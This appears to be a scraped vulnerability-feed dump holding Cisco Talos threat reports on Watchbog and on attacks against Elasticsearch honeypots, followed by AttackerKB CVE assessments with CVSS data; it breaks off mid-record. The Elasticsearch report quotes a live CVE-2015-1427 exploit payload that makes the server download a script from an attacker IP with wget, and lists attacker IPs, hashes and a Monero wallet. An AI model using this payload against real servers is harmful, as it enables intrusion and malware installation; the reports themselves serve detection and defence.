deletion was typically added to the end of a handful of the Pastebin scripts, with the Xmr-stak download and the SSH Lateral Movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible. We were able to rely upon our clients centralized logging to fill in those holes, and the hosts themselves still had evidence. The most obvious being the malware variants themselves. \n \n\n\n## Conclusion \n\n \nUnpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed. Once that foothold has been established, the attacker can then connect to their C2, achieve persistent long-term access to the environment and spread laterally \u2014 which is exactly what happened in this case. The best way to prevent such activity would be to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it\u2019s also important to have a maintenance window and a test environment to ensure that the new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals. Establish a baseline for internal network traffic and if any significant deviations occur, identify and investigate them. Even if there is an existing theory for the activity. In this case, Watchbog generated a noticeable spike in the organization\u2019s SSH traffic. \n \n\n\n## Coverage\n\nIntrusion prevention systems such as [SNORT\u00ae](<https://snort.org/>) provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as [Cisco AMP for Endpoints](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>), which gives users the ability to track process invocation and inspect processes. Try AMP for free [here](<http://cisco.com/go/tryamp>). \n \nAdditional ways our customers can detect and block these threats are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-yUCBqjJUM8M/XVF7-jm_JLI/AAAAAAAAAT8/hhCfba_JHMUia21PuHBNSgH416W1Gc9KwCLcBGAs/s1600/image6.png>)\n\n \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ ](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)[Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## Indicators of Compromise (IOCs)\n\n \nThe following IOCs have been observed associated with Watchbog. \n \n\n\n### Hashes (SHA256):\n\n \nb383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61 0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a \n \n3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA \n \n\n\n### Domains:\n\n \naziplcr72qjhzvin[.]onion[.]to \n \n\n\n### Misc:\n\n \nMonero Wallet (Same wallet as the Alibaba Cloud Post) \n \n47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 \n \n", "modified": "2019-09-11T09:10:37", "published": "2019-09-11T09:10:37", "id": "TALOSBLOG:C136648C951F9482ABC1764BDBCABCC9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/peidHg1L8SY/watchbog-patching.html", "type": "talosblog", "title": "Watchbog and the Importance of Patching", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "attackerkb": [{"lastseen": "2023-10-18T16:44:49", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2023-10-07T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:15:46", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 02, 2020 12:18am UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\n**space-r7** at May 15, 2020 7:15pm UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-2883", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-2883"], "modified": "2020-07-30T00:00:00", "id": "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "href": "https://attackerkb.com/topics/Y21wr47Bk3/cve-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:40:05", "description": "The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2017-9791", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2023-10-05T00:00:00", "id": "AKB:4D7DB359-066E-4E56-AFBB-FA98BF564F13", "href": "https://attackerkb.com/topics/rjpuGwbz6x/cve-2017-9791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-21T01:57:50", "description": "Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at January 29, 2021 5:47pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\n**space-r7** at May 15, 2020 7:02pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\n**gwillcox-r7** at October 20, 2020 6:53pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-2555", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555"], "modified": "2021-01-20T00:00:00", "id": "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "href": "https://attackerkb.com/topics/gB0KtHnrZE/cve-2020-2555", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:14:08", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We\u2019re fixing this issue by adding `SignedObject` to the blacklist. We\u2019re also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\n\n \n**Recent assessments:** \n \n**space-r7** at September 11, 2020 5:56pm UTC reported:\n\nThe `readFrom` method within the `Command` class in the Jenkins CLI remoting component deserializes objects received from clients without first checking / sanitizing the data. Because of this, a malicious serialized object contained within a serialized `SignedObject` can be sent to the Jenkins endpoint to achieve code execution on the target.\n\nThis is a fairly old vulnerability, so it\u2019s _unlikely_ that there are many, if any vulnerable installations on the web today, but I rated this vulnerability based on what it _could_ give an attacker if they were to find a vulnerable installation online today. This vulnerability is yet another Java deserialization vulnerability that I would define as critical given a number of reasons:\n\n 1. Unauthenticated code execution \n\n 2. There is no special / proprietary protocol that will hinder exploitation ( you just send the object in the body of a POST request ) \n\n 3. A proof of concept exists and has for some time \n\n\nAgain, this is an unlikely target given the date of the vulnerability, but I think an attacker would definitely aim to exploit this if it was spotted online.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "attackerkb", "title": "CVE-2017-1000353", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-23T00:00:00", "id": "AKB:5A79A3DC-D4D7-4FF8-BE45-A4E658714412", "href": "https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:40:05", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 